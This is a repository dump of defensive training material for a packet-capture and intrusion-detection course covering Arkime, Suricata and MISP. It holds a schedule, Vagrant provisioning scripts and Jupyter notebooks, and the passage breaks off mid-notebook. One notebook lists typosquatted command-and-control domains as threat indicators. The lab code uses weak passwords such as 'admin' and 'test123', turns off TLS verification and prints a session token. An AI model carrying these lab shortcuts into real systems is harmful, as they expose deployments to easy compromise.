├── .gitignore ├── Arkime ├── README.md ├── clustering │ ├── 000-parliament.ipynb │ ├── README.md │ └── Vagrantfile ├── misp_wise │ ├── 000-wise-recap.ipynb │ ├── 001-MISP-Samples.ipynb │ ├── 002-MISP-Populate.ipynb │ └── README.md ├── package_setup │ ├── README.md │ └── Vagrantfile ├── pikksilm │ └── README.md ├── polarproxy │ └── README.md ├── prepare-laptop.md ├── queries │ ├── 000-moloch-api.ipynb │ ├── 001-conn-ela.ipynb │ ├── 002-uniq-and-sessions.ipynb │ ├── 003-export-pcap.ipynb │ ├── 004-tagging.ipynb │ ├── README.md │ ├── Vagrantfile │ └── provision.sh ├── setup │ ├── README.md │ ├── Vagrantfile │ └── build-freebsd.md ├── suricata │ └── README.md ├── tuning │ ├── README.md │ ├── Vagrantfile │ └── provision.sh └── wise │ ├── README.md │ ├── Vagrantfile │ └── provision.sh ├── LICENSE ├── README.md ├── Suricata ├── README.md ├── build │ ├── README.md │ ├── hyperscan.md │ └── intro.md ├── config │ └── README.md ├── data-exploration │ ├── 001-load-eve.ipynb │ ├── 999-tasks.ipynb │ ├── README.md │ └── eve.json ├── datasets │ └── README.md ├── docker │ ├── dalton │ │ ├── build.sh │ │ └── stop.sh │ └── redisLogging │ │ ├── docker-compose.yml │ │ └── logstash-redis-ela.conf ├── ebpf │ └── README.md ├── elastic-cluster │ └── README.md ├── elastic-log-shipping │ ├── 000-bulk-eve.ipynb │ ├── 000-bulk-intro.ipynb │ ├── README.md │ └── syslog.md ├── elastic │ └── README.md ├── eve │ └── README.md ├── frontend │ └── README.md ├── intro │ └── README.md ├── ips │ ├── README.md │ └── exercises.md ├── live │ └── README.md ├── lua │ ├── README.md │ ├── provision.sh │ ├── stats2influxdb.lua │ ├── stats2influxdb.md │ └── stats2influxdb_onelongline.lua ├── rules │ └── README.md ├── rulesets │ ├── 000-explore-rulesets.ipynb │ └── README.md ├── selks │ ├── README.md │ └── hunt-pcap-read.png ├── suricata-update │ └── README.md ├── unix-socket │ └── README.md └── vagrant │ ├── README.md │ ├── day1 │ ├── Vagrantfile │ └── provision.sh │ ├── day2 │ └── Vagrantfile │ └── day3 │ └── Vagrantfile ├── common ├── Closing.md ├── GoHello.md ├── SetUpGoLang.md ├── certstream-mining.md ├── day_intro.md ├── docker │ └── README.md ├── elastic │ ├── README.md │ ├── docker-compose.yml │ ├── elastic.api.md │ ├── elastic.config.basic.md │ ├── elastic.config.example.md │ ├── elastic.ingest.md │ ├── elastic.install.md │ ├── elastic.mappings.md │ ├── kibana.install.md │ ├── kibana.queries.md │ └── logstash-redis-ela.conf └── vagrant │ ├── README.md │ ├── Vagrantfile │ └── scripts │ ├── install-salt-minion.sh │ └── install-telegraf.sh ├── data ├── README.md ├── download-public-sources.sh └── source-mta-pcap.txt ├── prerequisites └── README.md ├── saynomore.png └── singlehost ├── README.md ├── Vagrantfile ├── export.ndjson ├── grafana-provision ├── Containers-1554370521612.json ├── NIC-1554373671497.json ├── Resources-1554370481064.json └── elasticsearch-1554374529889.json ├── intro.md └── provision.sh /.gitignore: -------------------------------------------------------------------------------- 1 | *.dat 2 | *.zip 3 | *.csv 4 | *.deb 5 | *.gz 6 | *.log 7 | *.dump 8 | *.pcap 9 | *.cap 10 | *.swp 11 | *.bak 12 | *.tgz 13 | *.run 14 | 15 | # Build and Release Folders 16 | src/ 17 | pkg/ 18 | bin/ 19 | bin-debug/ 20 | bin-release/ 21 | [Oo]bj/ # FlashDevelop obj 22 | [Bb]in/ # FlashDevelop bin 23 | 24 | # R specifics 25 | **/R/* 26 | **/.RStudio 27 | **/lib/* 28 | **/.rstudio-desktop/* 29 | **/.rstudio/* 30 | **/.config/* 31 | **/.nv/* 32 | **/.cache/* 33 | **/.jupyter/* 34 | **/.local/* 35 | **/.ipynb_checkpoints/* 36 | 37 | # 
Other files and folders 38 | .settings/ 39 | .vagrant/ 40 | students/ 41 | 42 | # Executables 43 | *.swf 44 | *.air 45 | *.ipa 46 | *.apk 47 | 48 | # Project files, i.e. `.project`, `.actionScriptProperties` and `.flexProperties` 49 | # should NOT be excluded as they contain compiler settings and other important 50 | # information for Eclipse / Flash Builder. 51 | 52 | ltmain.sh 53 | 54 | # nested git repos 55 | Suricata/docker/dalton/dalton/ 56 | 57 | # stuff that will be worked on during class 58 | Suricata/vagrant/multihost/states/top.sls 59 | Suricata/vagrant/multihost/states/test.sls 60 | Suricata/vagrant/multihost/pillar 61 | 62 | .venv/* 63 | venv/* 64 | 65 | # suricata rules 66 | *.rules 67 | 68 | # Lua scripts written as example or test 69 | *.lua 70 | -------------------------------------------------------------------------------- /Arkime/README.md: -------------------------------------------------------------------------------- 1 | 2 | This material has been designed to be taught in a [classroom](https://ccdcoe.org/training/cyber-defence-monitoring-course-large-scale-packet-capture-analysis-june-2024/) environment... hands-on 80% + talk 40% + **slides 0%** = 120% hard work 3 | 4 | **The online material is missing some of the contextual concepts and ideas that will be covered in class.** 5 | 6 | This is **4 days** of material for any intermediate-level dev-ops who has some experience with other security|monitoring tools and wants to learn Arkime. We believe these classes are perfect for anyone who wants a jump start in learning Arkime or who wants a more thorough understanding of it internals. 7 | 8 | ### Arkime is a large scale, open source, full packet capturing, indexing, and database system. 9 | 10 | > Arkime was formerly named **Moloch**, so the materials on this site may still refer to it as Moloch in various ways or forms. Same holds true for the Arkime codebase. 11 | 12 | > Arkime is not meant to replace Intrusion Detection Systems (IDS). Arkime augments your current security infrastructure by storing and indexing network traffic in standard PCAP format, while also providing fast indexed access. 13 | 14 | **NB! Provided timeline is preliminary and will develop according to the actual progress of the class. 
On-site participation only.** 15 | 16 | ## Day -1 :: Intro, singlehost, basic Viewer usage :: June 3 2024, *starts at 13:00!* 17 | 18 | * 12:30 Registration open, coffee 19 | 20 | * 13:00 - 17:00 21 | * [Intro](/common/day_intro.md) 22 | * [Singlehost](/singlehost/) 23 | * LS24 overview 24 | * [Basic viewer and queries](/Arkime/queries/#using-the-viewer) 25 | * Intro to LS24 data capture 26 | 27 | ## Day 1 :: Install, basic configuration :: June 4 2024 28 | 29 | * 09:30 - 12:30 30 | * [Arkime setup](/Arkime/package_setup/) 31 | * [basic config](/Arkime/setup/#Config) 32 | * 13:30 - 17:00 33 | * [Hunting - RT Web](/Arkime/queries/#hunting-trip) 34 | 35 | ## Day 2 :: Advanced configuration, enrichment :: June 5 2024 36 | 37 | * 09:30 - 12:30 38 | * [Arkime setup, adding new fields](/Arkime/package_setup/) 39 | * 13:30 - 17:00 40 | * [MISP integration](/Arkime/misp_wise/) 41 | * [Suricata integration](/Arkime/suricata/) 42 | * [Suricata](/Suricata) 43 | 44 | ## Day 3 :: Suricata, SSL/TLS proxy :: June 6 2024 45 | 46 | * 09:30 - 12:30 47 | * [Suricata rules](/Suricata/rules), [suricata-update](/Suricata/suricata-update) 48 | * [Suricata datasets](/Suricata/datasets) 49 | * 13:30 - 17:00 50 | * [Hunting - RT client side](/Arkime/queries/#hunting-trip) 51 | * [Polarproxy](/Arkime/polarproxy) 52 | 53 | ## Day +1 :: Last but not least :: June 7 2024, *ends at 12:00* 54 | 55 | * 09:30 - 10:30 56 | * [Hunting - RT Net](/Arkime/queries/#hunting-trip) 57 | * 11:00 - 12:00 58 | * [feedback, contact exchange, thanks, etc.](/common/Closing.md) 59 | 60 | 61 | ## Orphan topics, topics from previous iterations that we might or might not cover 62 | 63 | * Splitting LS BT traffic 64 | * [build from source](/Arkime/setup/#Build) 65 | * [Pikksilm](/Arkime/pikksilm) 66 | * [WISE - Plugins](/Arkime/wise#writing-a-wise-plugin) 67 | * [Clustered elastic](/Arkime/clustering#clustered-elasticsearch), [multinode](/Arkime/clustering#moloch-workers) 68 | * [Clustering teamwork, cont](/Arkime/clustering) 69 | * [evebox](/Suricata/indexing#evebox), [scirius](/Suricata/indexing#scirius), [kibana](/Suricata/indexing#kibana) 70 | 71 | ## For trying out locally -- *not needed for classroom!* 72 | 73 | * [vagrant](/common/vagrant/), [docker](/common/docker) 74 | * [Prepare local environment](/Arkime/prepare-laptop.md) 75 | 76 | ---- 77 | 78 | # Before You Come To Class 79 | 80 | * browse trough ... 
81 | * [Arkime](https://arkime.com/) 82 | * [Arkime in GitHub](https://github.com/arkime/arkime) 83 | * [Arkime FAQ](https://arkime.com/faq) 84 | * [Arkime learn](https://arkime.com/learn) 85 | * [InfoSec matters - Arkime FPC](http://blog.infosecmatters.net/2017/05/moloch-fpc.html) 86 | -------------------------------------------------------------------------------- /Arkime/clustering/000-parliament.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 28, 6 | "metadata": {}, 7 | "outputs": [], 8 | "source": [ 9 | "import requests" 10 | ] 11 | }, 12 | { 13 | "cell_type": "code", 14 | "execution_count": 24, 15 | "metadata": {}, 16 | "outputs": [], 17 | "source": [ 18 | "r = requests.put(\"http://localhost:8008/parliament/api/auth/update\", data={\n", 19 | " \"newPassword\": \"admin\"\n", 20 | "})" 21 | ] 22 | }, 23 | { 24 | "cell_type": "code", 25 | "execution_count": 25, 26 | "metadata": {}, 27 | "outputs": [], 28 | "source": [ 29 | "respData = r.content.decode(\"utf-8\")" 30 | ] 31 | }, 32 | { 33 | "cell_type": "code", 34 | "execution_count": 26, 35 | "metadata": {}, 36 | "outputs": [ 37 | { 38 | "data": { 39 | "text/plain": [ 40 | "{'success': True,\n", 41 | " 'text': \"Here's your new token!\",\n", 42 | " 'token': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbiI6dHJ1ZSwiaWF0IjoxNTU4MDk1MzYzLCJleHAiOjE1NTgxODE3NjN9.aX1F_vbvJAUCGGb4pgsMcY89A1foYZ-i0vOxmvAyArw'}" 43 | ] 44 | }, 45 | "execution_count": 26, 46 | "metadata": {}, 47 | "output_type": "execute_result" 48 | } 49 | ], 50 | "source": [ 51 | "import json\n", 52 | "respDataObj = json.loads(respData)\n", 53 | "respDataObj" 54 | ] 55 | }, 56 | { 57 | "cell_type": "code", 58 | "execution_count": 27, 59 | "metadata": {}, 60 | "outputs": [ 61 | { 62 | "data": { 63 | "text/plain": [ 64 | "'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbiI6dHJ1ZSwiaWF0IjoxNTU4MDk1MzYzLCJleHAiOjE1NTgxODE3NjN9.aX1F_vbvJAUCGGb4pgsMcY89A1foYZ-i0vOxmvAyArw'" 65 | ] 66 | }, 67 | "execution_count": 27, 68 | "metadata": {}, 69 | "output_type": "execute_result" 70 | } 71 | ], 72 | "source": [ 73 | "token = respDataObj[\"token\"]\n", 74 | "token" 75 | ] 76 | }, 77 | { 78 | "cell_type": "code", 79 | "execution_count": 36, 80 | "metadata": {}, 81 | "outputs": [], 82 | "source": [ 83 | "r = requests.post(url = \"http://localhost:8008/parliament/api/groups\", json = {\n", 84 | " \"token\": token,\n", 85 | " \"title\": \"test123\"\n", 86 | "})\n", 87 | "respData2 = r.content.decode(\"utf-8\")\n", 88 | "print(respData2)\n", 89 | "respData2Obj = json.loads(respData2)" 90 | ] 91 | }, 92 | { 93 | "cell_type": "code", 94 | "execution_count": 40, 95 | "metadata": {}, 96 | "outputs": [ 97 | { 98 | "data": { 99 | "text/plain": [ 100 | "0" 101 | ] 102 | }, 103 | "execution_count": 40, 104 | "metadata": {}, 105 | "output_type": "execute_result" 106 | } 107 | ], 108 | "source": [ 109 | "createdGroupId = respData2Obj[\"group\"][\"id\"]\n", 110 | "createdGroupId" 111 | ] 112 | }, 113 | { 114 | "cell_type": "code", 115 | "execution_count": 42, 116 | "metadata": {}, 117 | "outputs": [ 118 | { 119 | "name": "stdout", 120 | "output_type": "stream", 121 | "text": [ 122 | 
"{\"success\":true,\"cluster\":{\"title\":\"localbox\",\"url\":\"http://localhost:8005\",\"id\":0,\"status\":\"green\",\"totalNodes\":1,\"dataNodes\":1,\"deltaBPS\":2210,\"deltaTDPS\":0,\"molochNodes\":1,\"monitoring\":39},\"parliament\":{\"version\":2,\"groups\":[{\"title\":\"test123\",\"id\":0,\"clusters\":[{\"title\":\"localbox\",\"url\":\"http://localhost:8005\",\"id\":0,\"status\":\"green\",\"totalNodes\":1,\"dataNodes\":1,\"deltaBPS\":2210,\"deltaTDPS\":0,\"molochNodes\":1,\"monitoring\":39}]}],\"settings\":{\"general\":{\"noPackets\":0,\"noPacketsLength\":10,\"outOfDate\":30,\"esQueryTimeout\":5,\"removeIssuesAfter\":60,\"removeAcknowledgedAfter\":15,\"hostname\":\"moloch-cluster-student-box-1\"},\"notifiers\":{\"slack\":{\"name\":\"slack\",\"fields\":{\"slackWebhookUrl\":{\"name\":\"slackWebhookUrl\",\"required\":true,\"type\":\"secret\",\"description\":\"Incoming Webhooks are a simple way to post messages from external sources into Slack.\",\"value\":\"\"}},\"alerts\":{\"esRed\":true,\"esDown\":true,\"esDropped\":true,\"outOfDate\":true,\"noPackets\":true}},\"twilio\":{\"name\":\"twilio\",\"fields\":{\"accountSid\":{\"name\":\"accountSid\",\"required\":true,\"type\":\"secret\",\"description\":\"Twilio account ID\",\"value\":\"\"},\"authToken\":{\"name\":\"authToken\",\"required\":true,\"type\":\"secret\",\"description\":\"Twilio authentication token\",\"value\":\"\"},\"toNumber\":{\"name\":\"toNumber\",\"required\":true,\"description\":\"The number to send the alert to\",\"value\":\"\"},\"fromNumber\":{\"name\":\"fromNumber\",\"required\":true,\"description\":\"The number to send the alert from\",\"value\":\"\"}},\"alerts\":{\"esRed\":true,\"esDown\":true,\"esDropped\":true,\"outOfDate\":true,\"noPackets\":true}},\"email\":{\"name\":\"email\",\"fields\":{\"secure\":{\"name\":\"secure\",\"type\":\"checkbox\",\"description\":\"Send the email securely\",\"value\":\"\"},\"host\":{\"name\":\"host\",\"required\":true,\"description\":\"Email host\",\"value\":\"\"},\"port\":{\"name\":\"port\",\"required\":true,\"description\":\"Email port\",\"value\":\"\"},\"user\":{\"name\":\"user\",\"description\":\"The username of the user sending the email\",\"value\":\"\"},\"password\":{\"name\":\"password\",\"type\":\"secret\",\"description\":\"Password of the user sending the email\",\"value\":\"\"},\"from\":{\"name\":\"from\",\"required\":true,\"description\":\"Send the email from this address\",\"value\":\"\"},\"to\":{\"name\":\"to\",\"required\":true,\"description\":\"Send the email to this address\",\"value\":\"\"},\"subject\":{\"name\":\"subject\",\"description\":\"The subject of the email (defaults to \\\"Parliament Alert\\\")\",\"value\":\"\"}},\"alerts\":{\"esRed\":true,\"esDown\":true,\"esDropped\":true,\"outOfDate\":true,\"noPackets\":true}}}},\"password\":\"$2b$13$25W7rHGYIdtl6TfLtI2P4uJfGXmY/SR8ZMip5K8NiKTGzNkGG2Ffi\"},\"text\":\"Successfully added the requested cluster.\"}\n" 123 | ] 124 | } 125 | ], 126 | "source": [ 127 | "# \"{\\\"token\\\":\\\"${token}\\\", \\\"title\\\":\\\"singlehost\\\",\\\"url\\\":\\\"http://singlehost:8005\\\"}\"\n", 128 | "r = requests.post(url = \"http://localhost:8008/parliament/api/groups/{}/clusters\".format(createdGroupId), json = {\n", 129 | " \"token\": token,\n", 130 | " \"title\": \"localbox\",\n", 131 | " \"url\": \"http://localhost:8005\"\n", 132 | "})\n", 133 | "respData3 = r.content.decode(\"utf-8\")\n", 134 | "print(respData3)" 135 | ] 136 | }, 137 | { 138 | "cell_type": "code", 139 | "execution_count": null, 140 | "metadata": {}, 141 | 
"outputs": [], 142 | "source": [] 143 | } 144 | ], 145 | "metadata": { 146 | "kernelspec": { 147 | "display_name": "Python 3", 148 | "language": "python", 149 | "name": "python3" 150 | }, 151 | "language_info": { 152 | "codemirror_mode": { 153 | "name": "ipython", 154 | "version": 3 155 | }, 156 | "file_extension": ".py", 157 | "mimetype": "text/x-python", 158 | "name": "python", 159 | "nbconvert_exporter": "python", 160 | "pygments_lexer": "ipython3", 161 | "version": "3.6.7" 162 | } 163 | }, 164 | "nbformat": 4, 165 | "nbformat_minor": 2 166 | } 167 | -------------------------------------------------------------------------------- /Arkime/clustering/Vagrantfile: -------------------------------------------------------------------------------- 1 | # -*- mode: ruby -*- 2 | # vi: set ft=ruby : 3 | 4 | SPLIT_DB_AND_MOLO=true 5 | NAME="student" 6 | BOXES=1 7 | MEM_PER_BOX=2048 8 | CPU_PER_BOX=4 9 | 10 | ELA_MEM=2048 11 | ELA_CPU=4 12 | 13 | if SPLIT_DB_AND_MOLO == true and MEM_PER_BOX > 2048 14 | puts "Separate elastic vm will be created. Consider reducing the amount of memory per box" 15 | end 16 | 17 | $script = <<-SCRIPT 18 | systemctl stop systemd-resolved.service 19 | echo "nameserver 1.1.1.1" > /etc/resolv.conf 20 | SCRIPT 21 | 22 | $docker = <<-SCRIPT 23 | export DEBIAN_FRONTEND=noninteractive 24 | echo 'Acquire::ForceIPv4 "true";' | sudo tee /etc/apt/apt.conf.d/99force-ipv4 25 | apt-get -qq -y install \ 26 | apt-transport-https \ 27 | ca-certificates \ 28 | curl \ 29 | gnupg-agent \ 30 | software-properties-common 31 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add - 32 | add-apt-repository \ 33 | "deb [arch=amd64] https://download.docker.com/linux/ubuntu \ 34 | $(lsb_release -cs) \ 35 | stable" 36 | apt-get update && apt-get install -qq -y docker-ce docker-ce-cli containerd.io 37 | systemctl enable docker.service 38 | systemctl start docker.service 39 | adduser vagrant docker 40 | SCRIPT 41 | 42 | PKGDIR="/vagrant/pkgs" 43 | WGET_PARAMS="-4 -q" 44 | MOLOCH="moloch_1.8.0-1_amd64.deb" 45 | 46 | $moloch = <<-SCRIPT 47 | FILE=/etc/sysctl.conf 48 | grep "disable_ipv6" $FILE || cat >> $FILE <> $FILE <> /vagrant/provision.log 2>&1 60 | 61 | cd #{PKGDIR} 62 | [[ -f #{MOLOCH} ]] || wget #{WGET_PARAMS} https://files.molo.ch/builds/ubuntu-18.04/#{MOLOCH} 63 | dpkg -s moloch || dpkg -i #{MOLOCH} 64 | SCRIPT 65 | 66 | $moloch_basic_config = <<-SCRIPT 67 | delim=";"; ifaces=""; for item in `ls /sys/class/net/ | egrep '^eth|ens|eno|enp'`; do ifaces+="$item$delim"; done ; ifaces=${ifaces%"$deli$delim"} 68 | delim=";"; for item in `ls /sys/class/net/ | egrep '^eth|ens|eno|enp'`; do ethtool -K $item tx off sg off gro off gso off lro off tso off ; done 69 | cd /data/moloch/etc 70 | cp config.ini.sample config.ini 71 | sed -i "s,MOLOCH_ELASTICSEARCH,192.168.56.XXX:9200,g" config.ini 72 | sed -i "s,MOLOCH_INTERFACE,$ifaces,g" config.ini 73 | sed -i "s,MOLOCH_INSTALL_DIR,/data/moloch,g" config.ini 74 | sed -i "s,MOLOCH_PASSWORD,test123,g" config.ini 75 | cd /data/moloch/bin 76 | ./moloch_update_geo.sh > /dev/null 2>&1 77 | mkdir -p /data/moloch/raw && chown nobody /data/moloch/raw 78 | 79 | SCRIPT 80 | 81 | $prep_elastic_kernel_conf = <<-SCRIPT 82 | grep "vm.max_map_count" /etc/sysctl.conf || echo "vm.max_map_count=262144" >> /etc/sysctl.conf 83 | sysctl -p 84 | SCRIPT 85 | 86 | $jupyter = <<-SCRIPT 87 | apt-get update && apt-get install -y python3 python3-pip 88 | su - vagrant -c "pip3 install --user --upgrade jupyter jupyterlab elasticsearch" 89 | su - vagrant -c "pip3 install 
--user --upgrade chardet" 90 | su - vagrant -c "pip3 install --user --upgrade urllib3" 91 | su - vagrant -c "mkdir ~/.jupyter" 92 | cat >> /home/vagrant/.jupyter/jupyter_notebook_config.json < /dev/null" 11 | ] 12 | }, 13 | { 14 | "cell_type": "code", 15 | "execution_count": null, 16 | "id": "e4dafc1e-d624-4029-bc1f-2e50678641f9", 17 | "metadata": {}, 18 | "outputs": [], 19 | "source": [ 20 | "import urllib3\n", 21 | "urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)" 22 | ] 23 | }, 24 | { 25 | "cell_type": "markdown", 26 | "id": "a62035cb-7a53-4cc5-a9ff-fecc8228647d", 27 | "metadata": {}, 28 | "source": [ 29 | "* **Please change the token so it would reflect the MISP server you actually use.**" 30 | ] 31 | }, 32 | { 33 | "cell_type": "code", 34 | "execution_count": null, 35 | "id": "37bf14a7-730e-4cb2-9386-7bbf4151b04d", 36 | "metadata": {}, 37 | "outputs": [], 38 | "source": [ 39 | "# This is from a local testing env, so commiting the secret for training is fine\n", 40 | "TOKEN = \"TOKEN\"\n", 41 | "HOST = \"https://192.168.56.12\"" 42 | ] 43 | }, 44 | { 45 | "cell_type": "code", 46 | "execution_count": null, 47 | "id": "75302e5c-07ec-4769-b797-d025f04580d6", 48 | "metadata": {}, 49 | "outputs": [], 50 | "source": [ 51 | "from pymisp import PyMISP" 52 | ] 53 | }, 54 | { 55 | "cell_type": "code", 56 | "execution_count": null, 57 | "id": "b6c7d279-724a-4c47-b53f-16c34a1d9e9f", 58 | "metadata": {}, 59 | "outputs": [], 60 | "source": [ 61 | "misp = PyMISP(HOST, TOKEN, False, debug=False)" 62 | ] 63 | }, 64 | { 65 | "cell_type": "code", 66 | "execution_count": null, 67 | "id": "a3bf4cb3-ea4d-4249-93d1-95807ac18091", 68 | "metadata": {}, 69 | "outputs": [], 70 | "source": [ 71 | "result = misp.search(controller='attributes', timestamp=\"1d\", type_attribute=\"domain\", category=\"Network activity\", pythonify=False)" 72 | ] 73 | }, 74 | { 75 | "cell_type": "code", 76 | "execution_count": null, 77 | "id": "f2023e94-a841-4d81-9893-a32d629c8f5a", 78 | "metadata": {}, 79 | "outputs": [], 80 | "source": [ 81 | "from IPython.display import JSON" 82 | ] 83 | }, 84 | { 85 | "cell_type": "code", 86 | "execution_count": null, 87 | "id": "04626e16-a5a0-49e1-99a4-eca4fc96608e", 88 | "metadata": {}, 89 | "outputs": [], 90 | "source": [ 91 | "JSON(result)" 92 | ] 93 | }, 94 | { 95 | "cell_type": "code", 96 | "execution_count": null, 97 | "id": "f40bb4da-cf95-45c8-8356-57a04e526f94", 98 | "metadata": {}, 99 | "outputs": [], 100 | "source": [ 101 | "import pandas as pd" 102 | ] 103 | }, 104 | { 105 | "cell_type": "code", 106 | "execution_count": null, 107 | "id": "741061e4-9626-4e53-9c00-8ff2e8e604d6", 108 | "metadata": {}, 109 | "outputs": [], 110 | "source": [ 111 | "DF = pd.json_normalize(result[\"Attribute\"])\n", 112 | "len(DF)" 113 | ] 114 | }, 115 | { 116 | "cell_type": "code", 117 | "execution_count": null, 118 | "id": "fb52a077-2dfd-487d-999b-4702f6a8df40", 119 | "metadata": {}, 120 | "outputs": [], 121 | "source": [ 122 | "DF" 123 | ] 124 | }, 125 | { 126 | "cell_type": "code", 127 | "execution_count": null, 128 | "id": "bc5d9d77-b502-49d4-a93c-9fe0d8337c97", 129 | "metadata": {}, 130 | "outputs": [], 131 | "source": [ 132 | "DF.groupby(\"type\").agg({\"value\": \"nunique\", \"event_id\": \"nunique\"})" 133 | ] 134 | }, 135 | { 136 | "cell_type": "code", 137 | "execution_count": null, 138 | "id": "4306fbf3-6aeb-4370-b94e-929fb6d8152c", 139 | "metadata": {}, 140 | "outputs": [], 141 | "source": [ 142 | "DF.groupby([\"Event.info\", \"event_id\", \"type\"]).agg({\"value\": 
[\"unique\", \"nunique\"]})" 143 | ] 144 | } 145 | ], 146 | "metadata": { 147 | "kernelspec": { 148 | "display_name": "Python 3 (ipykernel)", 149 | "language": "python", 150 | "name": "python3" 151 | }, 152 | "language_info": { 153 | "codemirror_mode": { 154 | "name": "ipython", 155 | "version": 3 156 | }, 157 | "file_extension": ".py", 158 | "mimetype": "text/x-python", 159 | "name": "python", 160 | "nbconvert_exporter": "python", 161 | "pygments_lexer": "ipython3", 162 | "version": "3.10.12" 163 | } 164 | }, 165 | "nbformat": 4, 166 | "nbformat_minor": 5 167 | } 168 | -------------------------------------------------------------------------------- /Arkime/misp_wise/002-MISP-Populate.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": null, 6 | "id": "5f509ce2-965c-4e61-bcd3-54410bb3e4c0", 7 | "metadata": { 8 | "tags": [] 9 | }, 10 | "outputs": [], 11 | "source": [ 12 | "%pip install pymisp > /dev/null" 13 | ] 14 | }, 15 | { 16 | "cell_type": "code", 17 | "execution_count": null, 18 | "id": "1493f901-e0dd-41ca-baae-016ce6fd906b", 19 | "metadata": { 20 | "tags": [] 21 | }, 22 | "outputs": [], 23 | "source": [ 24 | "import urllib3\n", 25 | "urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)" 26 | ] 27 | }, 28 | { 29 | "cell_type": "code", 30 | "execution_count": null, 31 | "id": "fab74a2b-9f40-4691-a2ec-2a8126caef04", 32 | "metadata": { 33 | "tags": [] 34 | }, 35 | "outputs": [], 36 | "source": [ 37 | "%pip install python-dotenv" 38 | ] 39 | }, 40 | { 41 | "cell_type": "code", 42 | "execution_count": null, 43 | "id": "09eee1fc-5203-4d76-a9e2-c7d2d64b96ff", 44 | "metadata": { 45 | "tags": [] 46 | }, 47 | "outputs": [], 48 | "source": [ 49 | "from dotenv import dotenv_values" 50 | ] 51 | }, 52 | { 53 | "cell_type": "markdown", 54 | "id": "45d1b6a4-4541-40d4-a670-0765b9805672", 55 | "metadata": {}, 56 | "source": [ 57 | "# Define MISP params" 58 | ] 59 | }, 60 | { 61 | "cell_type": "code", 62 | "execution_count": null, 63 | "id": "2fd0b2dc-f739-464c-bf4d-f44f1a99afbd", 64 | "metadata": {}, 65 | "outputs": [], 66 | "source": [ 67 | "# This is from a local testing env, so commiting the secret for training is fine\n", 68 | "TOKEN = \"TOKEN\"\n", 69 | "HOST = \"https://192.168.56.12\"" 70 | ] 71 | }, 72 | { 73 | "cell_type": "markdown", 74 | "id": "92c9a960-0f27-49ce-b988-407334d5401d", 75 | "metadata": {}, 76 | "source": [ 77 | "# Create MISP object" 78 | ] 79 | }, 80 | { 81 | "cell_type": "code", 82 | "execution_count": null, 83 | "id": "8abc0dd1-9ddf-46d4-b40a-5a320b7839fd", 84 | "metadata": { 85 | "tags": [] 86 | }, 87 | "outputs": [], 88 | "source": [ 89 | "from pymisp import ExpandedPyMISP, MISPEvent, MISPTag" 90 | ] 91 | }, 92 | { 93 | "cell_type": "code", 94 | "execution_count": null, 95 | "id": "9998812a-5d0a-46a2-8471-a883141bc2fd", 96 | "metadata": { 97 | "tags": [] 98 | }, 99 | "outputs": [], 100 | "source": [ 101 | "misp = ExpandedPyMISP(HOST, TOKEN, False, debug=False)" 102 | ] 103 | }, 104 | { 105 | "cell_type": "markdown", 106 | "id": "2cc6262d-757a-42d2-a1ab-49f23f6dbbc1", 107 | "metadata": {}, 108 | "source": [ 109 | "# Define MISP event" 110 | ] 111 | }, 112 | { 113 | "cell_type": "code", 114 | "execution_count": null, 115 | "id": "a5bd78b1-fd13-45e7-b742-2e1eb8ed64e1", 116 | "metadata": { 117 | "tags": [] 118 | }, 119 | "outputs": [], 120 | "source": [ 121 | "event = MISPEvent()\n", 122 | "event.info = \"LS 2023 Day 1 RT C2 domains\"" 123 | ] 124 | }, 
125 | { 126 | "cell_type": "markdown", 127 | "id": "07f624de-76c6-4e96-aa1a-f4cd125bf8d8", 128 | "metadata": {}, 129 | "source": [ 130 | "# Create MISP event" 131 | ] 132 | }, 133 | { 134 | "cell_type": "code", 135 | "execution_count": null, 136 | "id": "a9eee7a6-61c9-4cd6-b1ce-2103e1842858", 137 | "metadata": { 138 | "tags": [] 139 | }, 140 | "outputs": [], 141 | "source": [ 142 | "result = misp.add_event(event=event, pythonify=True)" 143 | ] 144 | }, 145 | { 146 | "cell_type": "markdown", 147 | "id": "1bbf9770-3bb2-438f-ba47-93002a341ae1", 148 | "metadata": { 149 | "tags": [] 150 | }, 151 | "source": [ 152 | "# Define IoC values and buffer them for upload" 153 | ] 154 | }, 155 | { 156 | "cell_type": "code", 157 | "execution_count": null, 158 | "id": "ac058855-df11-4acd-9f0a-3191496cf6e8", 159 | "metadata": { 160 | "tags": [] 161 | }, 162 | "outputs": [], 163 | "source": [ 164 | "IOC = \"\"\"\n", 165 | "gstatlc.net\n", 166 | "scdn.co.uk\n", 167 | "rnicrosoftonline.net\n", 168 | "mozllla.com\n", 169 | "awsamazon.eu\n", 170 | "msn365.org\n", 171 | "\"\"\".split()" 172 | ] 173 | }, 174 | { 175 | "cell_type": "code", 176 | "execution_count": null, 177 | "id": "380c7b23-ab71-4cea-8cfc-efccd0d29732", 178 | "metadata": { 179 | "tags": [] 180 | }, 181 | "outputs": [], 182 | "source": [ 183 | "IOC" 184 | ] 185 | }, 186 | { 187 | "cell_type": "code", 188 | "execution_count": null, 189 | "id": "086bba5a-c80d-4c1d-9cc3-6df5970e76eb", 190 | "metadata": {}, 191 | "outputs": [], 192 | "source": [ 193 | "for ioc in IOC:\n", 194 | " tag = MISPTag()\n", 195 | " tag.from_dict(name=\"kill-chain:\\\"Command and Control\\\"\")\n", 196 | " result.add_attribute(type=\"domain\", \n", 197 | " value=ioc,\n", 198 | " tags=[tag])" 199 | ] 200 | }, 201 | { 202 | "cell_type": "markdown", 203 | "id": "1c0e8036-dc77-4860-9844-701874dda33e", 204 | "metadata": {}, 205 | "source": [ 206 | "# Bulk update event" 207 | ] 208 | }, 209 | { 210 | "cell_type": "code", 211 | "execution_count": null, 212 | "id": "3fd1aaff-06e0-484d-81f8-c6e0c3f7639b", 213 | "metadata": { 214 | "tags": [] 215 | }, 216 | "outputs": [], 217 | "source": [ 218 | "import pandas as pd" 219 | ] 220 | }, 221 | { 222 | "cell_type": "code", 223 | "execution_count": null, 224 | "id": "84a5b36d-7fcd-4df6-8b6e-d9990aee5fa2", 225 | "metadata": { 226 | 